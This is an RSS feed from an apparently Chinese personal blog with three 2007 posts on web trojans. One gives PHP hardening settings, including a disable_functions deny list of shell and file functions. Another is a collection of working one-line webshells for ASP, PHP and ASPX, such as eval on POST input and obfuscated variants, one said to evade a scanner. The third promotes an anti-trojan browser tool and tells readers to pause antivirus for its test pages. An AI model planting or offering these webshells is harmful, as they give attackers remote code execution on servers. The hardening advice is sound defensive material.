<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>嘟嘟鱼 &#187; 木马</title>
	<atom:link href="http://www.duduyu.net/tag/%e6%9c%a8%e9%a9%ac/feed" rel="self" type="application/rss+xml" />
	<link>http://www.duduyu.net</link>
	<description>嘟嘟鱼的个人博客</description>
	<lastBuildDate>Thu, 15 Dec 2011 07:54:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>防范php木马</title>
		<link>http://www.duduyu.net/193</link>
		<comments>http://www.duduyu.net/193#comments</comments>
		<pubDate>Tue, 18 Sep 2007 05:07:00 +0000</pubDate>
		<dc:creator>嘟嘟鱼</dc:creator>
				<category><![CDATA[技术]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[木马]]></category>

		<guid isPermaLink="false">http://www.kuaixiang.net/?p=210</guid>
		<description><![CDATA[1、防止跳出web目录 （严重采用） 　　首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么... ]]></description>
			<content:encoded><![CDATA[<p>1、防止跳出web目录 （严重采用）</p>
<p>　　首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：</p>
<p>　　php_admin_value open_basedir /usr/local/apache/htdocs</p>
<p>　　这样，如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许，如果错误显示打开的话会提示这样的错误：</p>
<p>　　Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。<br />
<span id="more-194"></span><br />
如果有多个基于域名的虚拟主机</p>
<p>&lt;VirtualHost *&gt;<br />
ServerName     www.test1.com<br />
DocumentRoot /usr/local/apache/htdocs/test1<br />
&lt;Directory /usr/local/apache/htdocs/test1&gt;<br />
     php_admin_value open_basedir     /usr/local/apache/htdocs/test1<br />
&lt;/Directory&gt;<br />
&lt;/VirtualHost&gt;</p>
<p>注意:在php_admin_value open_basedir别忘了加上php.ini中指定的PHP临时上传目录和session保存目录，不然会无法上传文件、存取session<br />
php.ini中按如下配置：<br />
upload_tmp_dir = "/tmp"<br />
session.save_path = "/var/phpsession"</p>
<p>　　2、防止php木马执行webshell （严重采用）</p>
<p>　　打开safe_mode，</p>
<p>　　在，php.ini中设置</p>
<p>　　disable_functions= passthru，exec，shell_exec，system</p>
<p>　　二者选一即可，也可都选</p>
<p>　　3、防止php木马读写文件目录 （好像没有要求这么严格,不推荐采用。）</p>
<p>　　在php.ini中的</p>
<p>　　disable_functions= passthru，exec，shell_exec，system</p>
<p>　　后面加上php处理文件的函数</p>
<p>　　主要有</p>
<p>　　fopen，mkdir，rmdir，chmod，unlink，dir</p>
<p>　　fopen，fread，fclose，fwrite，file_exists</p>
<p>　　closedir，is_dir，readdir.opendir</p>
<p>　　fileperms.copy，unlink，delfile</p>
<p>　　即成为</p>
<p>　　disable_functions= passthru，exec，shell_exec，system，fopen，mkdir，rmdir，chmod，unlink，dir</p>
<p>　　，fopen，fread，fclose，fwrite，file_exists</p>
<p>　　，closedir，is_dir，readdir.opendir</p>
<p>　　，fileperms.copy，unlink，delfile</p>
<p>　　ok，大功告成，php木马拿我们没辙了.</p>
<h3  class="related_post_title">您可能也对这些文章感兴趣</h3><ul class="related_post"><li><a href="http://www.duduyu.net/to-choose-u0026quotnextu0026quot-programming-language" title="选择学习“下一个”程序语言">选择学习“下一个”程序语言</a></li><li><a href="http://www.duduyu.net/use-php-to-download-css-file-picture" title="利用PHP下载CSS文件中的图片">利用PHP下载CSS文件中的图片</a></li><li><a href="http://www.duduyu.net/php-load-linux-under-way-mbstring" title="linux下php加载mbstring的方法">linux下php加载mbstring的方法</a></li><li><a href="http://www.duduyu.net/ip-address-to-achieve-efficient-use-of-qqwry-dat-retrieve-php" title="利用 QQWry.Dat 实现 IP 地址高效检索（PHP）">利用 QQWry.Dat 实现 IP 地址高效检索（PHP）</a></li><li><a href="http://www.duduyu.net/248" title="刚参加完Discuz！研发人员与PHPer技术交流会">刚参加完Discuz！研发人员与PHPer技术交流会</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.duduyu.net/193/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>一句话木马的多种写法</title>
		<link>http://www.duduyu.net/a-variety-of-writing-a-word-trojan</link>
		<comments>http://www.duduyu.net/a-variety-of-writing-a-word-trojan#comments</comments>
		<pubDate>Thu, 30 Aug 2007 16:00:00 +0000</pubDate>
		<dc:creator>嘟嘟鱼</dc:creator>
				<category><![CDATA[技术]]></category>
		<category><![CDATA[一句话]]></category>
		<category><![CDATA[木马]]></category>

		<guid isPermaLink="false">http://www.kuaixiang.net/?p=241</guid>
		<description><![CDATA[经典的东西收藏一份 asp一句话 &#60;%execute(request("1"))%&#62; php一句话 &#60;?php eval($_POST[1]);?&#62; @preg_replace("/[email]/e",$_POST['h'],"error"); aspx一句话 &#60;script language="C#" runat="server"&#62; WebAdmin2Y.x.y aaaaa = n... ]]></description>
			<content:encoded><![CDATA[<p>经典的东西收藏一份<br />
asp一句话</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;%execute(request("1"))%&gt;</p>
<p>php一句话</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;?php eval($_POST[1]);?&gt;</p>
<p class="UBBContent">@preg_replace("/[email]/e",$_POST['h'],"error");</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">aspx一句话</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;script language="C#" runat="server"&gt;<br />
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");<br />
&lt;/script&gt;</p>
<p>可以躲过雷客图的一句话。</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;%<br />
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")<br />
ms.Language="VBScript"<br />
ms.AddObject "Response", Response<br />
ms.AddObject "request", request<br />
ms.ExecuteStatement("ev"&amp;"al(request(""1""))")<br />
%&gt;</p>
<p>不用'&lt;,&gt;'的asp一句话</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;script language=VBScript runat=server&gt;execute request("1")&lt;/script&gt;</p>
<p>不用双引号的一句话。</p>
<p class="UBBPanel" style="padding-left: 3px; margin: 15px;">
<p class="UBBContent">&lt;%eval request(chr(35))%&gt;</p>
<h3  class="related_post_title">您可能也对这些文章感兴趣</h3><ul class="related_post"><li><a href="http://www.duduyu.net/193" title="防范php木马">防范php木马</a></li><li><a href="http://www.duduyu.net/ie-1-2-for-the-anti-trojan-guard" title="IE卫士1.2 用于防网页木马">IE卫士1.2 用于防网页木马</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.duduyu.net/a-variety-of-writing-a-word-trojan/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>IE卫士1.2 用于防网页木马</title>
		<link>http://www.duduyu.net/ie-1-2-for-the-anti-trojan-guard</link>
		<comments>http://www.duduyu.net/ie-1-2-for-the-anti-trojan-guard#comments</comments>
		<pubDate>Mon, 14 May 2007 03:04:00 +0000</pubDate>
		<dc:creator>嘟嘟鱼</dc:creator>
				<category><![CDATA[资源]]></category>
		<category><![CDATA[IE卫士]]></category>
		<category><![CDATA[木马]]></category>

		<guid isPermaLink="false">http://www.kuaixiang.net/?p=381</guid>
		<description><![CDATA[from:http://www.iekavass.cn/ IE卫士 IEKavassInstall.rar 软件介绍 软件功能和特点：1。软件嵌入浏览器（Internet Explorer、Maxthon），从木马运行的必要途径上拦截木马的运行，不夸张的说，它可以抵御现今... ]]></description>
			<content:encoded><![CDATA[<p>from:<a target="_blank" href="http://www.iekavass.cn/" title="http://www.iekavass.cn/">http://www.iekavass.cn/</a></p>
<p>IE卫士</p>
<p><a href="http://langouster.com/iekavass/upfile/IEKavassInstall.rar">IEKavassInstall.rar</a><br />
软件介绍</p>
<p>软件功能和特点：1。软件嵌入浏览器（Internet Explorer、Maxthon），从木马运行的必要途径上拦截木马的运行，不夸张的说，它可以抵御现今为至各种原理的网页木马的来袭，不论是已知木马还是未知木马；2。软件几乎不占用CPU资源，因为它没有进程，和浏览器融为一体，只在浏览器启动时做好一切防御工作，然后就一直等待，只有当木马病毒来袭时程序才会被重新唤醒；3。软件安装后你会惊奇的发现系统和安装前没有任何不同，你看不到任何的进程，也没有任何的浏览器插件按钮，唯一的不同只是当你浏览木马网页时浏览器会给出警告信息。<span id="more-10381"></span></p>
<p>软件安装说明：1。我可以保证的说，程序绝无任何恶意组件；2。我也可以保证的说，程序能完全卸载干净（卸载时请关闭所有IE窗口），卸载的方法是再次运行安装程序，它会自动检测是新安装还是卸载；3。软件在安装时有些主动防御的杀毒软件可能会有警告信息，您不必有任何担心，这是因为软件采用了BHO技术和浏览器融合（迅雷也采用了这一技术），而有些木马也会采用这一技术实现自启动，因此杀毒软件会认为这是一项危险操作，您可以完全相信本程序无恶意成份；4。为了强调本软件绝无恶意成份，我以langouster这个网名的名誉保证这点，大家可以在baidu上搜一下就知道这个网名至少不是一文不值的。</p>
<p>软件技术说明：软件核心采用HOOK技术，挂钩了多个木马病毒执行必需的API，有些API都是MicroSoft公司未公开的。软件采用了MD5求HASH值的方法保证了程序的完整性。</p>
<p>拦截效果测试：为说明问题及检测IE卫士的效果，我这里给出一种测试方法：以下几个测试页面是黑客常用的网页木马程序，这里已经把它们修改为无害程序，你可以在装IE卫士前先打开这几个页面，如果看到一个提示您有漏洞的对话框那么说明你的电脑极易受攻击，强烈建议安装IE卫士；然后在安装IE卫士后（别忘了重启浏览器）再次打开下面的网页，如果你看到拦截对话框那么IE卫士已成功安装并发挥功效（当然是在前一次测试报告你的电脑存在漏洞的情况下才能看到，不然的话本身木马也不会运行，谈何IE卫士拦截），否则如果您在安装有IE卫士之后还看到了漏洞提示对话框那么请告诉我。</p>
<p>测试页面：MS06014漏洞测试 ANI漏洞测试 注意：由于测试页面为黑客常用的页面，所以两个测试页面可能会被杀毒软件拦截，你可以先暂停杀毒软件。<br />
<a rel="lightbox[roadtrip]" target="_blank" href="http://langouster.com/iekavass/upfile/1.JPG"><img border="0" width="286" src="http://langouster.com/iekavass/upfile/1.JPG" alt="http://langouster.com/iekavass/upfile/1.JPG" height="152" /></a><br />
<a rel="lightbox[roadtrip]" target="_blank" href="http://langouster.com/iekavass/upfile/2.JPG"><img border="0" width="487" src="http://langouster.com/iekavass/upfile/2.JPG" alt="http://langouster.com/iekavass/upfile/2.JPG" height="123" /></a><br />
软件完整演示录像：<a target="_blank" href="http://langouster.com/iekavass/upfile/3.gif" title="http://langouster.com/iekavass/upfile/3.gif">演示录像</a></p>
<p>支持系统：最新版本支持所有安装有Internet Explorer或Mathon（遨游）2.0版本以下的Windows 2000、Windows XP及Windows 2003系统；1.0版本不支持Windows 2000系统。</p>
<p>注意：Windows 2003系统中默认设置下Internet Explorer不加载BHO，你需要手动设置支持，如图：<br />
<a rel="lightbox[roadtrip]" target="_blank" href="http://langouster.com/iekavass/upfile/4.JPG"><img border="0" width="500" src="http://langouster.com/iekavass/upfile/4.JPG" alt="http://langouster.com/iekavass/upfile/4.JPG" height="343" /></a><br />
<a rel="lightbox[roadtrip]" target="_blank" href="http://langouster.com/iekavass/upfile/5.JPG"><img border="0" width="431" src="http://langouster.com/iekavass/upfile/5.JPG" alt="http://langouster.com/iekavass/upfile/5.JPG" height="448" /></a></p>
<h3  class="related_post_title">您可能也对这些文章感兴趣</h3><ul class="related_post"><li><a href="http://www.duduyu.net/193" title="防范php木马">防范php木马</a></li><li><a href="http://www.duduyu.net/a-variety-of-writing-a-word-trojan" title="一句话木马的多种写法">一句话木马的多种写法</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.duduyu.net/ie-1-2-for-the-anti-trojan-guard/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

